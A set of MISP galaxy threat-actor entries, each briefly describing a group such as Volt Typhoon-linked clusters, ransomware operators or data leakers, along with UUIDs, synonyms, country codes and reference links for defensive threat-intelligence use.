UUID 6fcf8d1f-2e68-4982-a579-2ca5595e4990
which can be used as unique global reference for UNC5337
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UNC5291
UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that Volt Typhoon was targeting critical infrastructure and was potentially interested in Ivanti Connect Secure devices for initial access.
Internal MISP references
UUID b2535333-629d-4cd6-a98b-14c86f6a57ee
which can be used as unique global reference for UNC5291
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC3569
China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.
Internal MISP references
UUID dd0063e0-2d44-4798-9e6d-ef0eaa2c2508
which can be used as unique global reference for UNC3569
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Earth Freybug
Earth Freybug, identified as a subset of APT41, is a cyberthreat group active since at least 2012, engaging in espionage and financially motivated activities across various sectors worldwide. The tactics, techniques, and procedures (TTPs) used in this campaign are similar to the ones from a campaign (Operation CuckooBees) described in an article published by Cybereason. They employ a diverse toolkit, including LOLBins and custom malware, to execute sophisticated cyberespionage attacks. The group's recent tactics involve DLL hijacking and API unhooking through a newly discovered malware named UNAPIMON, which prevents child processes from being monitored. This technique was observed in a vmtoolsd.exe process creating remote tasks to deploy malicious batch files for reconnaissance and backdoor access. UNAPIMON's simplicity and use of Microsoft Detours for defense evasion highlight the group's evolving methods and the need for vigilant security measures, such as restricting admin privileges and adhering to the principle of least privilege. Earth Freybug's persistence and creativity in refining their techniques underscore the ongoing threat they pose and the importance of proactive cybersecurity practices.
Internal MISP references
UUID c6e2e5ba-ffad-4258-8b6e-775b3fa230c3
which can be used as unique global reference for Earth Freybug
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
GhostR
Ghostr is a financially motivated threat actor known for stealing a confidential database containing 5.3 million records from World-Check and leaking about 186GB of data from a stock trading platform. They have been active on Breachforums.is, revealing massive data breaches involving comprehensive details of Thai users, including full names, phone numbers, email addresses, and ID card numbers.
Internal MISP references
UUID 0e4ed0ab-87e2-4588-8fc0-3d720e0efebd
which can be used as unique global reference for GhostR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UTA0218
UTA0218 is a threat actor with advanced capabilities, targeting organizations to establish a reverse shell, acquire tools, and extract data. They exploit vulnerabilities in firewall devices to move laterally within victim networks, focusing on obtaining domain backup keys and Active Directory credentials. The actor deploys a custom Python backdoor named UPSTYLE to execute commands and download additional tools. UTA0218 is likely state-backed, utilizing a mix of infrastructure including VPNs and compromised routers to store malicious files.
Internal MISP references
UUID ee8b8fc4-59f4-4442-a4e6-3686d09c6509
which can be used as unique global reference for UTA0218
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0149
UAC-0149 is a threat actor targeting the Armed Forces of Ukraine with COOKBOX malware. They use obfuscation techniques like character encoding and base64 encoding to evade detection. The group leverages dynamic DNS services and Cloudflare Workers for their C2 infrastructure.
Internal MISP references
UUID f5f6d4eb-1ec3-494e-807d-5b767122f9b2
which can be used as unique global reference for UAC-0149
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ArcaneDoor
ArcaneDoor is a campaign that is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns. As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications. In the past two years, we have seen a dramatic and sustained increase in the targeting of these devices in areas such as telecommunications providers and energy sector organizations — critical infrastructure entities that are likely strategic targets of interest for many foreign governments.
Internal MISP references
UUID 97a10d3b-5cb5-4df9-856c-515994f3e953
which can be used as unique global reference for ArcaneDoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-1849
UAT4356 is a state-sponsored threat actor that targeted government networks globally through a campaign named ArcaneDoor. They exploited two zero-day vulnerabilities in Cisco Adaptive Security Appliances to deploy custom malware implants called "Line Runner" and "Line Dancer." The actor demonstrated a deep understanding of Cisco systems, utilized anti-forensic measures, and took deliberate steps to evade detection. UAT4356's sophisticated attack chain allowed them to conduct malicious actions such as configuration modification, reconnaissance, network traffic capture/exfiltration, and potentially lateral movement on compromised devices.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Storm-1849.
Known Synonyms |
---|
UAT4356 |
Internal MISP references
UUID 3d94ef07-9fd6-4d64-bf1e-f1316f2686a4
which can be used as unique global reference for Storm-1849
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
USDoD
USDoD is a threat actor known for leaking large databases of personal information, including from companies like Airbus and the U.S. Environmental Protection Agency. They have a history of engaging in high-profile data breaches, such as exposing data from the FBI's InfraGard program. USDoD has also been involved in web scraping to obtain information from websites like LinkedIn.
Internal MISP references
UUID d6882fb9-d1e4-4cec-889c-5423c772d199
which can be used as unique global reference for USDoD
in MISP communities and other software using the MISP galaxy
External references
- https://www.hackread.com/us-environmental-protection-agency-hacked-data-leaked/ - webarchive
- https://www.cysecurity.news/2023/09/transunion-refutes-data-breach-reports.html - webarchive
- https://socradar.io/unmasking-usdod-the-enigma-of-the-cyber-realm/ - webarchive
- https://krebsonsecurity.com/2023/09/fbi-hacker-dropped-stolen-airbus-data-on-9-11/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Water Orthrus
Water Orthrus is a threat actor known for distributing CopperStealer and CopperPhish malware. They target Microsoft 365 users with phishing campaigns to steal credit card information. The actor has evolved their malware to include rootkits for stealthy installations and has shifted their focus from personal information to cryptocurrency and credit card data. Water Orthrus has been linked to the Scranos campaign reported in 2019.
Internal MISP references
UUID 19ddf2b0-9cfb-430f-8919-49205cbec863
which can be used as unique global reference for Water Orthrus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
PhantomCore
PhantomCore is a threat actor group known for using a remote access malware called PhantomRAT. They have been observed executing malicious code through specially crafted RAR archives, different from previous attacks exploiting vulnerabilities. The attribution of their campaign to Ukraine is uncertain due to limited visibility inside Russian networks. PhantomCore's use of RAR archives in their attack chain has been previously observed in other threat actor groups like Forest Blizzard.
Internal MISP references
UUID 485947c7-edb6-4a07-9276-2114dc767551
which can be used as unique global reference for PhantomCore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CiberInteligenciaSV
CiberInteligenciaSV is a threat actor that leaked 5.1 million Salvadoran records on Breach Forums. They have also compromised El Salvador's state Bitcoin wallet, Chivo, leaking its source code and VPN credentials. The group aims to obscure their involvement by associating with the Guacamaya group and its proxies.
Internal MISP references
UUID 0558bc64-21d9-43e4-8b12-18172d9b5c7d
which can be used as unique global reference for CiberInteligenciaSV
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Void Manticore
Void Manticore is an Iranian APT group affiliated with MOIS, known for conducting destructive wiping attacks and influence operations. They collaborate with Scarred Manticore, sharing targets and conducting disruptive operations using custom wipers. Void Manticore's TTPs involve manual file deletion, lateral movement via RDP, and the deployment of custom wipers like the BiBi wiper. The group utilizes online personas like 'Karma' and 'Homeland Justice' to leak information and amplify the impact of their attacks.
Internal MISP references
UUID 53ac2695-35ba-4ab2-a5cd-48ca533f1b72
which can be used as unique global reference for Void Manticore
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Alpha Spider
ALPHA SPIDER is a threat actor known for developing and operating the Alphv ransomware as a service. They have been observed using novel offensive techniques, such as exploiting software vulnerabilities and leveraging legitimate administration tools for malicious activities. ALPHA SPIDER affiliates have demonstrated persistence in exfiltrating data and have shown the ability to bypass security measures like DNS-based filtering and multifactor authentication. Despite lacking specific operational security measures, defenders have opportunities to detect and respond to ALPHA SPIDER's operations effectively.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Alpha Spider.
Known Synonyms |
---|
ALPHV Ransomware Group |
Internal MISP references
UUID 6149f3b6-510d-4e45-bf88-cd25c7193702
which can be used as unique global reference for Alpha Spider
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RansomHub
RansomHub is a rapidly growing ransomware group believed to be an updated version of the older Knight ransomware. They have been linked to attacks exploiting the Zerologon vulnerability to gain initial access. RansomHub has attracted former affiliates of the ALPHV ransomware group and operates as a Ransomware-as-a-Service with a unique affiliate prepayment model. The group has been active in extorting victims and leaking sensitive data to pressure for ransom payments.
Internal MISP references
UUID 9d218bb3-fc59-43e0-a273-a0a0fb5c463e
which can be used as unique global reference for RansomHub
in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomhub-knight-ransomware - webarchive
- https://forescoutstage.wpengine.com/blog/analysis-a-new-ransomware-group-emerges-from-the-change-healthcare-cyber-attack/ - webarchive
- https://www.sentinelone.com/blog/ransomware-evolution-how-cheated-affiliates-are-recycling-victim-data-for-profit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Unfading Sea Haze
Unfading Sea Haze is a threat actor focused on espionage, targeting government and military organizations in the South China Sea region since 2018. They employ spear-phishing emails with malicious attachments to gain initial access, followed by the deployment of custom malware such as Gh0st RAT variants and SharpJSHandler. The group utilizes scheduled tasks and manipulates local administrator accounts for persistence, while also incorporating Remote Monitoring and Management tools into their attacks. Unfading Sea Haze demonstrates a sophisticated and patient approach, remaining undetected for years and showing adaptability through evolving exfiltration tactics and malware arsenal.
Internal MISP references
UUID 58e75098-8edc-48ce-b1de-c1a8647e33d3
which can be used as unique global reference for Unfading Sea Haze
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
StucxTeam
StucxTeam is a threat actor known for targeting Israeli systems, including SCADA systems and the Red Alert missile protection system. StucxTeam has also developed a mobile application called MyOPECS for coordinating attacks, which includes features like DDoS attacks and is expected to add more capabilities in the future. Additionally, they have been observed using VPNs and proxy software to conceal their activities and have a history of making threats against those who cooperate with Israel.
Internal MISP references
UUID ee13ddb3-e8c0-4568-b56c-82d82c30f48b
which can be used as unique global reference for StucxTeam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
FlyingYeti
FlyingYeti is a Russia-aligned threat actor targeting Ukrainian military entities. They conduct reconnaissance activities and launch phishing campaigns using malware like COOKBOX. FlyingYeti exploits the WinRAR vulnerability CVE-2023-38831 to infect targets with malicious payloads. Cloudforce One has successfully disrupted their operations and provided recommendations for defense against their phishing campaigns.
Internal MISP references
UUID 1dcbad05-c5b7-4ec3-8920-45f396554f7a
which can be used as unique global reference for FlyingYeti
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
SEXi
SEXi is a ransomware group that targets VMware ESXi servers, encrypting data and demanding ransom payments. They have been observed encrypting virtual machines and backups, causing significant disruptions to services. The group's name is a play on the word "ESXi," indicating a deliberate focus on these systems. SEXi has been linked to other ransomware variants based on the Babuk source code.
Internal MISP references
UUID 1bd2034f-a135-4c71-b08f-867b7f9e7998
which can be used as unique global reference for SEXi
in MISP communities and other software using the MISP galaxy
External references
- https://www.cybersecurity-insiders.com/proven-data-restores-powerhosts-vmware-backups-after-sexi-ransomware-attack/ - webarchive
- https://heimdalsecurity.com/blog/powerhosts-esxi-servers-encrypted-with-new-sexi-ransomware/ - webarchive
- https://www.darkreading.com/threat-intelligence/sexi-ransomware-desires-vmware-hypervisors - webarchive
Associated metadata
Metadata key | Value |
---|---|
LilacSquid
LilacSquid is an APT actor targeting a variety of industries worldwide since at least 2021. They use tactics such as exploiting vulnerabilities and compromised RDP credentials to gain access to victim organizations. Their post-compromise activities involve deploying MeshAgent and a customized version of QuasarRAT known as PurpleInk to maintain control over infected systems. LilacSquid has been observed using tools like Secure Socket Funneling for data exfiltration.
Internal MISP references
UUID efacc258-fa0e-4686-99d2-03bab14a640e
which can be used as unique global reference for LilacSquid
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Hunt3r Kill3rs
Hunt3r Kill3rs is a newly emerged threat group claiming expertise in cyber operations, including ICS breaches and web application vulnerabilities exploitation. They have discussed using Java fuzzing in their exploits and have made unverified claims of joint attacks with other threat actors.
Internal MISP references
UUID 4b32ad58-972e-4aa2-be3d-ff875ed06eba
which can be used as unique global reference for Hunt3r Kill3rs
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UTG-Q-008
UTG-Q-008 is a threat actor targeting Linux platforms, primarily focusing on government and enterprise entities in China. They utilize a massive botnet network for espionage activities, including reconnaissance, brute-forcing, and Trojan component delivery. The actor has a history of compromising thousands of servers in China using a password dictionary based on Chinese Pinyin. UTG-Q-008 operates during standard working hours in the UTC+8 time zone, with potential ties to Eastern Europe.
Internal MISP references
UUID fd17cd3c-5131-4907-be7d-83a0c7dabd36
which can be used as unique global reference for UTG-Q-008
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Gitloker
Gitloker is a threat actor group targeting GitHub repositories, wiping their contents, and extorting victims for their data. They use stolen credentials to compromise accounts, claim to have created a backup, and instruct victims to contact them on Telegram. The attackers leave a ransom note in the form of a README file, urging victims to negotiate the return of their data. GitHub is working to combat these evolving attacks and the vulnerabilities they exploit.
Internal MISP references
UUID 75cc313a-6a95-4ab8-b7f8-bfd7e4a7fe00
which can be used as unique global reference for Gitloker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC5537
UNC5537 is a financially motivated threat actor targeting Snowflake customer databases. They use stolen credentials obtained from infostealer malware to access and exfiltrate large volumes of data. The compromised accounts lack multi-factor authentication, allowing UNC5537 to conduct data theft and extortion.
Internal MISP references
UUID b8c6da46-4c9a-4075-b9f3-3b5ef7bd3534
which can be used as unique global reference for UNC5537
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Sp1d3r
Sp1d3r, a threat actor, has been involved in multiple data breaches targeting companies like Truist Bank, Cylance, and Advance Auto Parts. They have stolen and attempted to sell sensitive information, including customer and employee emails, account numbers, and source code. Sp1d3r has also claimed to have obtained data from a third-party platform and a cloud storage vendor. They have utilized hacking forums to sell the stolen data for significant sums of money.
Internal MISP references
UUID 2be04e23-4376-4333-87df-27d635e43a98
which can be used as unique global reference for Sp1d3r
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA571
TA571 is a spam distributor actor known for delivering a variety of malware, including DarkGate, NetSupport RAT, and information stealers. They use phishing emails with macro-enabled attachments to spread malicious PDFs containing rogue OneDrive links. TA571 has been observed using unique filtering techniques with intermediary "gates" to target specific users and bypass automated sandboxing. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware.
Internal MISP references
UUID 0245113e-cef3-4638-9532-3bf235b07d49
which can be used as unique global reference for TA571
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Bondnet
Bondnet is a threat actor that deploys backdoors and cryptocurrency miners. They use high-performance bots as C2 servers and configure reverse RDP environments on compromised systems. Bondnet has infected over 15,000 Windows server machines worldwide, primarily targeting Windows Server 2008 R2 systems. The botnet is used for mining cryptocurrencies like Monero, ByteCoin, RieCoin, and ZCash, potentially earning the operator thousands of dollars per day.
Internal MISP references
UUID 78e8bc1a-0be3-4792-a911-9d4813dd7bc3
which can be used as unique global reference for Bondnet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0020
Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine's military and defense sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UAC-0020.
Known Synonyms |
---|
SickSync |
Vermin |
Internal MISP references
UUID 318be739-26fd-4f4d-bac8-aa20ec8273b7
which can be used as unique global reference for UAC-0020
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Void Arachne
Void Arachne is a threat actor group targeting Chinese-speaking users with malicious MSI files containing legitimate software installers for AI software. They exploit public interest in VPN technology and AI software to distribute malware through SEO poisoning and Chinese-language-themed Telegram channels. The group's campaign includes bundling malicious Winos payloads with deepfake pornography-generating AI software and voice-and-face-swapping AI software. Void Arachne also promotes AI technologies for virtual kidnapping and uses AI voice-altering technology to pressure victims into paying ransom.
Internal MISP references
UUID 2ac0db88-8e88-447b-ad44-f781326f5884
which can be used as unique global reference for Void Arachne
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Markopolo
Markopolo is a threat actor known for running scams targeting cryptocurrency users through a fake app called Vortax. They use social media and a dedicated blog to legitimize their malicious activities. Markopolo has been linked to a credential-harvesting operation and is agile in pivoting to new scams when detected. The actor leverages shared hosting and C2 infrastructure for their malicious builds.
Internal MISP references
UUID c1e2121a-84c9-4fd0-99ef-917ded9cb3e1
which can be used as unique global reference for Markopolo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Adrastea
Adrastea is a threat actor who has been active on cybercrime forums, claiming to have breached organizations like MBDA and offering stolen data for sale. They describe themselves as a group of independent cybersecurity experts and researchers. Adrastea has been linked to ransomware operations, data leak platforms, and network access groups. The actor has been known to exploit critical vulnerabilities in target organizations' infrastructure to gain access to sensitive data.
Internal MISP references
UUID b7f37e61-0e1c-4818-9a04-8f83afdd337c
which can be used as unique global reference for Adrastea
in MISP communities and other software using the MISP galaxy
External references
- https://www.cysecurity.news/2022/11/missile-supplier-mbda-breach-disclosed.html - webarchive
- https://www.itsecurityguru.org/2022/09/14/documents-for-sale-on-the-dark-web/ - webarchive
- https://cybershafarat.com/2022/07/31/adrastea-hackers-claim-leading-european-designer-and-manufacturer-of-missile-systems-mbda-hacked/ - webarchive
- https://securityaffairs.co/wordpress/133881/data-breach/mbda-alleged-data-breach.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
JuiceLedger
JuiceLedger is a threat actor known for infostealing through their JuiceStealer .NET assembly. They have evolved from spreading fraudulent applications to conducting supply chain attacks, targeting PyPI contributors with phishing campaigns and typosquatting. Their malicious packages contain a code snippet that downloads and executes JuiceStealer, which has evolved to support additional browsers and Discord. Victims of JuiceLedger attacks are advised to reset passwords and report any suspicious activity to security@pypi.org.
Internal MISP references
UUID 8f4eb6bc-3d3d-49e4-82d8-500c7bb0a2ec
which can be used as unique global reference for JuiceLedger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RedJuliett
RedJuliett is a likely Chinese state-sponsored threat actor targeting government, academic, technology, and diplomatic organizations in Taiwan. They exploit vulnerabilities in network edge devices for initial access and use SQL injection and directory traversal exploits against web and SQL applications. The group operates from Fuzhou, China, and aims to support Beijing's intelligence collection on Taiwan's economic and diplomatic relations. RedJuliett has also expanded its operations to compromise organizations in other countries such as Hong Kong, Malaysia, and the United States.
Internal MISP references
UUID d20f5398-a362-4c88-b3fb-7e952dcf3948
which can be used as unique global reference for RedJuliett
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SneakyChef
SneakyChef is a threat actor known for using the SugarGh0st RAT to target government agencies, research institutions, and organizations worldwide. They have been active since at least August 2023, with a focus on leveraging old and new command and control domains. The group has been observed using lures in the form of scanned documents related to Ministries of Foreign Affairs and embassies. Talos Intelligence assesses with medium confidence that the operators are likely Chinese-speaking based on language preferences and specific targets.
Internal MISP references
UUID cdf4506e-09ea-4eb8-b898-b1b5381aa343
which can be used as unique global reference for SneakyChef
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
ALTDOS
ALTDOS is a threat actor group that has targeted entities in Southeast Asia, including Singapore, Thailand, and Malaysia. They have been involved in data breaches of companies in various sectors, such as real estate and retail, compromising sensitive information like customer names, bank account numbers, and transaction details. ALTDOS uses tactics like ransomware attacks, data exfiltration, and dumping data publicly or for sale on underground forums. The group has been known to demand ransom payments from victims, but also leaks data if demands are not met.
Internal MISP references
UUID 2bd6c045-2ec2-438e-af66-0d97a0163290
which can be used as unique global reference for ALTDOS
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/singapore-corporations-making-progress-in-preventing-cyberattacks/ - webarchive
- https://www.databreaches.net/altdos-claims-to-have-hacked-one-of-malaysias-biggest-conglomerates/ - webarchive
- https://www.databreaches.net/advisories-are-published-but-are-enough-entities-reading-them-and-taking-precautions/ - webarchive
- https://www.databreaches.net/singapore-real-estate-firm-breached-by-altdos/ - webarchive
- https://www.databreaches.net/sg-vhive-alerts-consumers-to-cyberattack/ - webarchive
- https://www.databreaches.net/sg-vhive-attackers-escalate-take-control-of-furniture-retailers-email-server/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
BlueHornet
BlueHornet is an advanced persistent threat group targeting government organizations in China, North Korea, Iran, and Russia. They have compromised and leaked data from other APT groups like Kryptonite Panda and Lazarus Group. BlueHornet has been involved in campaigns such as Operation Renminbi, Operation Ruble, and Operation EUSec, focusing on exfiltrating region-specific data and selling it on the dark web. They have also been known to collaborate with different threat actors and have recently disclosed a zero-day exploit in NGINX 1.18.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlueHornet.
Known Synonyms |
---|
APT49 |
AgainstTheWest |
Internal MISP references
UUID 06a615dc-fa13-4d6a-ac8b-3d2a8c9501c4
which can be used as unique global reference for BlueHornet
in MISP communities and other software using the MISP galaxy
External references
- https://cyberint.com/blog/research/bluehornet-one-apt-to-terrorize-them-all/ - webarchive
- https://www.mandiant.com/resources/blog/killnet-new-capabilities-older-tactics - webarchive
- https://www.csoonline.com/article/3684668/cyberattacks-against-governments-jumped-95-in-last-half-of-2022-cloudsek-says.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
HellHounds
Hellhounds is an APT group targeting organizations in Russia, using a modified version of Pupy RAT called Decoy Dog. They gain initial access through vulnerable web services and trusted relationships, with a focus on the public sector and IT companies. The group has been active since at least 2019, maintaining covert presence inside compromised organizations by modifying open-source projects to evade detection. Hellhounds have successfully targeted at least 48 victims, including a telecom operator where they disrupted services.
Internal MISP references
UUID 46ef6903-deac-415a-afaf-97e3ce067d7e
which can be used as unique global reference for HellHounds
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
IntelBroker
IntelBroker is a threat actor known for orchestrating high-profile data breaches targeting companies like Apple, Zscaler, and Facebook Marketplace. They have a reputation for selling access to compromised systems and data on underground forums like BreachForums. IntelBroker has claimed responsibility for breaches involving government agencies such as Europol, the U.S. Department of Transportation, and the Pentagon, leaking sensitive information and classified documents. The actor has been linked to breaches at companies like Acuity, General Electric, and Home Depot, showcasing a pattern of targeting critical infrastructure and major corporations.
Internal MISP references
UUID 849d16c8-eaa3-46e7-9c1c-179ef680922e
which can be used as unique global reference for IntelBroker
in MISP communities and other software using the MISP galaxy
External references
- https://www.cysecurity.news/2024/06/infamous-hacker-intelbroker-breaches.html - webarchive
- https://www.malwarebytes.com/blog/news/2024/06/was-t-mobile-compromised-by-a-zero-day-in-jira - webarchive
- https://securityaffairs.com/164263/cyber-crime/pandabuy-extorted-again.html - webarchive
- https://meterpreter.org/cybersecurity-firm-hacked-sensitive-data-on-sale/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Dragonbridge
DRAGONBRIDGE is a Chinese state-sponsored threat actor known for engaging in information operations to promote the political interests of the People's Republic of China. They have been observed using AI-generated images and videos to spread propaganda on social media platforms. The group has targeted various countries and regions, including the US, Taiwan, and Japan, with narratives promoting pro-PRC viewpoints. DRAGONBRIDGE has been linked to campaigns discrediting the US political system, sowing division between allies, and criticizing specific companies and individuals.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dragonbridge.
Known Synonyms |
---|
Spamouflage Dragon |
Internal MISP references
UUID a4d55f94-d842-400a-acb6-dfee1c446257
which can be used as unique global reference for Dragonbridge
in MISP communities and other software using the MISP galaxy
External references
- https://cloud.google.com/blog/topics/threat-intelligence/prc-dragonbridge-influence-elections/ - webarchive
- https://quointelligence.eu/2024/06/european-election-at-risk-analysis/ - webarchive
- https://blog.google/threat-analysis-group/over-50000-instances-of-dragonbridge-activity-disrupted-in-2022/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Boolka
Boolka is a threat actor known for infecting websites with malicious JavaScript scripts for data exfiltration. They have been carrying out opportunistic SQL injection attacks since at least 2022. Boolka has developed a malware delivery platform based on the BeEF framework and has been distributing the BMANAGER trojan. Their activities demonstrate a progression from basic website infections to more sophisticated malware operations.
Internal MISP references
UUID 99ad0cef-c53a-44d5-85d4-5459e59a06d5
which can be used as unique global reference for Boolka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CloudSorcerer
CloudSorcerer is a sophisticated APT targeting Russian government entities, utilizing cloud infrastructure for stealth monitoring and data exfiltration. The malware leverages APIs and authentication tokens to access cloud resources for command and control, with GitHub serving as its initial C2 server. CloudSorcerer operates as separate modules depending on the process it's running in, executing from a single executable and utilizing complex inter-process communication through Windows pipes. The actor behind CloudSorcerer shows similarities to the CloudWizard APT in modus operandi, but the unique code and functionality suggest it is a new threat actor inspired by previous techniques.
Internal MISP references
UUID 895548a2-e5c7-4a76-8425-19aa077db200
which can be used as unique global reference for CloudSorcerer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Water Sigbin
The 8220 Gang, also known as Water Sigbin, is a threat actor group that focuses on deploying cryptocurrency-mining malware. They exploit vulnerabilities in Oracle WebLogic servers, such as CVE-2017-3506 and CVE-2023-21839, to deliver cryptocurrency miners using PowerShell scripts. The group has demonstrated a sophisticated multistage loading technique to deploy the PureCrypter loader and XMRIG crypto miner. They are known for using obfuscation techniques, such as hexadecimal encoding and code obfuscation, to evade detection and compromise systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Water Sigbin.
Known Synonyms |
---|
8220 Gang |
Internal MISP references
UUID 745fd45f-9076-4c88-a977-01940bc0d36e
which can be used as unique global reference for Water Sigbin
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/24/f/water-sigbin-xmrig.html - webarchive
- https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html - webarchive
- https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat - webarchive
- https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/ - webarchive
- https://asec.ahnlab.com/en/51568/ - webarchive
- https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html - webarchive
- https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134 - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Void Banshee
Void Banshee is an APT group targeting North America, Europe, and Southeast Asia for information theft and financial gain. They exploit vulnerabilities like CVE-2024-38112 to deliver the Atlantida info-stealer through malicious PDFs disguised as book files. The group uses internet shortcuts with MHTML protocol handlers to access and execute files through disabled Internet Explorer, posing a significant threat to organizations. Void Banshee's TTPs include crafting URL strings to control window sizes in IE and using HTML files to hide malicious downloads from victims.
Internal MISP references
UUID df584835-97da-4e27-ab35-bcd3c5bf7815
which can be used as unique global reference for Void Banshee
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CRYSTALRAY
CRYSTALRAY is a threat actor known for leveraging open source tools like zmap and SSH-Snake to conduct widespread vulnerability scanning and exploitation. They target victims to collect and sell credentials, deploy cryptominers, and maintain persistence in compromised environments. CRYSTALRAY uses multiple backdoors to control access and spreads through victim networks using SSH-Snake. The actor also uses tools like Platypus for managing victims and extracting sensitive information from compromised systems.
Internal MISP references
UUID feeab818-a9bd-4bff-9923-bf8421abd6c5
which can be used as unique global reference for CRYSTALRAY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Lifting Zmiy
Rostelecom's security team has discovered a new APT group that is breaching companies via industrial PLCs. Named Lifting Zmiy, the group's first attacks were traced back to October 2023. The group targeted PLCs from the Russian company Tech-Automatics, usually used with elevators, which were still using their default passwords. Rostelecom has linked the group to intrusions at a Russian government contractor, two telecom operators, and an IT company. The company says the group collected and exfiltrated data and then destroyed the victims' infrastructure. Rostelecom says Lifting Zmiy uses Starlink infrastructure for attacks and appears to operate out of Eastern Europe.
Internal MISP references
UUID b9968b5f-0a5a-4be6-9dd2-428244741323
which can be used as unique global reference for Lifting Zmiy
